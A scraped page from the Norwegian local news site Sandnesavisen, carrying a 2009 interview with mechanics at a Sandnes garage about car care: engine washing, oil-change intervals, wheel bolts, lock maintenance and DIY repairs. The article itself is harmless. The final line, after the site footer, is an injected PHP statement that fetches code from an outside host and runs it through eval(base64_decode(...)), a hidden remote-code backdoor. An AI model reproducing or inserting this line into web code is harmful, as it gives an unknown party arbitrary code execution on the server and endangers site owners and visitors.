GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
21. juli 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vær - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bøker
Musikk
Film
Byen vår
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrått
Figgjo
Ganddal
Hana
Høle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Håndball
Kultur
Politikk
Økonomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersåk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Båt
Tog
Pass godt på bilen din
onsdag 01. april 2009

Er det ok å vaske bilen med høytrykksspyler? Hvor ofte bør du skifte olje? Er det en myte at vanlige folk stort sett ikke kan utføre reparasjoner på sin nye bil lenger? Disse og flere spørsmål tok vi med oss til Gann Bilverksted i Sandnes.

Pass godt på bilen din
Mange kjører med den samme oljen i tre og fire år. Da er oljen for lengst blitt for gammel. TEKST OG FOTO: RUNE THORESEN

I en krok på verkstedet sitter Egil Jåsund, Eirik Amundsen og Aleksander Kristiansen og har en liten kaffepause. Jåsund er raskt på banen med innspill om bilvask. - Vær veldig forsiktig med motorvask. Det er ikke bare å åpne panseret å spyle i vei. Dette kan fort føre til startproblemer eller skade ømfintlige komponenter i motorrommet. Det beste er å gå forsiktig frem med en spritvæske eller annet motor rensemiddel som fordamper. Tørk rent og la være å spyle med vann etterpå, understreker Jåsund. - Er det ok å vaske bilen med høytrykksspyler? - Det funger helt utmerket på karosseriet, men folk må ikke glemme at bilen også har en underside, sier Jåsund. Det er vel så viktig å få spylt vekk sand og skitt for ikke å si salt under bilen, og i alle hjulbuene. Bruk eventuelt hageslangen til dette for å komme godt til. Amundsen skyter inn at bilvaskemaskinene på bensinstasjonene i dag er veldig bra konstruert, og vasker bilen på en nesten mer skånsom måte enn du selv klarer med såpevann og svamp. Her får du også en god underspyling av bilen.

- Er det andre ting det er viktig å huske på med bilstellet ?

 - Husk å smøre alle dørpakninger. Frosten kan føre til at de kleber seg fast til karosseriet, og blir skadet når du åpner døra. Det er fornuftig å skifte vindusviskerne en gang i året. Amundsen minner videre om at mange også glemmer å vaske vinduene på innsiden. Nikotin og andre stoffer setter seg på glasset og danner et belegg som skaper dårlig sikt. Kristiansen er læregutt på verkstedet og nevner at dørlåsene i dagens biler kan skape problemer. - Folk bruker stort sett bare fjernkontrollen i dag, og når denne plutselig ikke virker kan låsesylinderen ha irret seg så fast at du ikke får låst opp bilen. Bruk nøkkelen i blant og husk på å smøre låsen av og til.

Oljeskift

- Hvor ofte bør en egentlig skifte olje? - Her er det forskjellige meninger ute og går, sier Jåsund. - På dagens biler heter det ofte hver 30.000 km eller hvert andre år. Problemet er bare at mange som kjører lite ender opp med å kjøre på den samme oljen i kanskje tre og fire år før de når 30.000 km. Da er oljen for lengst blitt for gammel. Gammel olje er ikke bra for motoren. Du kan påføre motoren skader som langt overstiger prisen på et oljeskift. På eldre biler vil vi uansett anbefale et fast årlig oljeskift for å sikre at oljen holder god kvalitet, sier Amundsen som skyter inn at en også bør sjekke oljenivået minst to ganger pr år. En bil kan faktisk bruke opptil 5 liter olje mellom to oljeskift. Hvis du da i mellomtiden ikke har passet på å sjekke oljenivået, kan du ende opp med skade på motoren. Det er også viktig å være oppmerksom på at dagens biler bruker mange forskjellige oljetyper. Sjekk med forhandler eller instruksjonsboka hvilken olje akkurat din bil trenger hvis du har tenkt å skifte eller fylle på selv.

Riktige bolter på hjulet - Hva med dekk og hjulskift, er det ting en kan gjøre feil her? - Det er lett å bruke feil hjulbolter eller mutter når en skifter dekk. Mange har sommerdekkene på aluminiumsfelger og vinterdekkene på stålfelger. Da trengs det ofte lengre eller kortere hjulbolter. Gjør man feil her kan det føre til at hjulet ikke sitter skikkelig fast eller i verste fall at en for lang bolt går inn i bremsesystemet bak hjulet og skader dette, sier Jåsund. - På felger som skal festes med mutter er det også viktig at denne skrues på riktig vei, det vil si at hvis mutteren er konet på ene siden, så skal denne normalt vendes innover mot hullet i felgen for å sikre at felgen låses skikkelig fast, forklarer Jåsund. - Etter hjulskift er det også viktig å ettertrekke boltene etter noen kjørte mil, spesielt med aluminiumsfelger. Hvis dette ikke blir gjort kan felgene løsne eller i verste fall falle av. Husk å reagere hvis du plutselig hører rare lyder under kjøring, det kan være signal på at felgene er i ferd med å løsne, advarer Jåsund.

Ungdommen prioriterer dyre stereoanlegg - Hvem er flinkest til å passe på bilen sin, ungdommen eller de eldre? Amundsen trekker litt oppgitt på skuldrene. - Ungdommen bruker kanskje mye penger på bil, men de prioriterer gjerne stereoanlegg og annet utstyr som pynter opp bilen, og glemmer å passe på bremser og andre sikkerhetsdetaljer. Folk som har hatt bil noen år har erfart og forstått hva som er viktigst, og er derfor flinkere til å ta vare på bilen og sørge for at den er trygg. - Er det riktig at nyere biler er bygget på en slik måte at vanlige folk ikke lenger kan utføre reparasjoner selv ? - Det har nok blitt slik etter hvert, ja. På noen Mercedeser må du eksempelvis i dag ha eget datautstyr bare for å skifte bremseklosser. - Det er vel allikevel en fordel rent sikkerhetsmessig at folk flest ikke kan skru så mye selv lenger. Vi ser en del rare eksempler på ting som går galt når folk forsøker å reparere bilen selv. Det kan ofte bli en dyr affære. En typisk ”gjør det selv’er” skifter gjerne olje, viftereim og andre enkle deler på bilen, men glemmer ofte ut viktige ting som for eksempel pollenfilteret i bilens ventilasjonssystem. Et tett filter reduser varmeapparatets kapasitet, og kan føre til at vinduene til stadighet dugger, forklarer Jåsund.

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));